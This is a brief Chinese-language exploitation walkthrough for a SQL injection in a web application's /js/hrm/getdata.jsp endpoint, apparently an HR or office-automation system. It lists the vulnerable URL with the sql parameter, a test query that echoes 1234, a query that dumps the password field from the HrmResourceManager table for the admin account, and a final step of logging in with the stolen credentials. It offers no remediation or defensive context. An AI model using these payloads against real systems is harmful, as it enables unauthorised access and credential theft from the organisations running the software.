漏洞利用过程
漏洞URL:
1
http://IP/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=注入
漏洞存在显示1234:
1
http://IP/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id
查询HrmResourceManager表中的sysadmind用户password字段:
1
http://IP/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
使用账户口令登录系统
